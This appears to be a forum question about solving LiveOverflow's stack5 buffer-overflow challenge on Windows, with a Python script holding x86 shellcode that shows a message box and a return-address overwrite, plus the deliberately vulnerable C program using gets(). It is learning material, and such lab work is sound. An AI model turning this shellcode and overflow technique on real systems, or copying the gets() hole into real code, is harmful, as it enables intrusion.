# Cannot pipe certain characters to another program from python (windows)

Tags: python, windows, pipe, python-2.x

I'm trying to solve LiveOverflow's stack5 challenge and for some reason my payload won't pipe correctly into the program.

It seems that this problem is caused because windows won't let me print certain hex characters into the CMD.

I'm using python 2.7.15 and the command `py -2 answer.py | stack5.exe`.

**`answer.py`:**

```py
import sys

payload = ("\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B\x52\x0C\x8B\x52\x14\x8B\x72\x28"
           "\x33\xC9\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D"
           "\x03\xF8\xE2\xF0\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B\x12\x75\xDA\x8B"
           "\x53\x3C\x03\xD3\xFF\x72\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03\xF3\x33"
           "\xC9\x41\xAD\x03\xC3\x81\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
           "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\x65\x75\xE2\x49\x8B\x72\x24\x03"
           "\xF3\x66\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14\x8E\x03\xD3\x52\x33\xFF"
           "\x57\x68\x61\x72\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\x53"
           "\xFF\xD2\x68\x33\x32\x01\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65\x72\x54"
           "\xFF\xD0\x68\x6F\x78\x41\x01\x8B\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
           "\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24\x2C\x57\x68\x4F\x5F\x6F\x21\x8B"
           "\xDC\x57\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\x88\x5C\x24\x03"
           "\x68\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24\x40\xFF\x54\x24"
           "\x40\x57\xFF\xD0")

sys.stdout.write(('\x90' + payload + ('\xcc' * ((256 + 12) - len(payload) - 1)) +
                  '\x00\x60\xFD\xB0'[::-1]))
```

[payload source](http://shell-storm.org/shellcode/files/shellcode-648.php)

**`stack5.c`:**

```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[256];

  gets(buffer);
}
```

Instead of popping up a message box saying `'O_o!'` after piping, the program quits (probably because of a certain error). Is there any way to insert this payload through piping that would work?

Comment: Ok, I see your point now. `sys.stdout` is pre-opened in the text mode. Consider writing to the underlying file object with `os.write(sys.stdout.fileno(), payload.encode())`.

Comment: @DYZ well while I can't test if it works right now I'm not sure If it will because stack5.c uses *gets* for input

Comment: Surely, gets will stop at the first 0.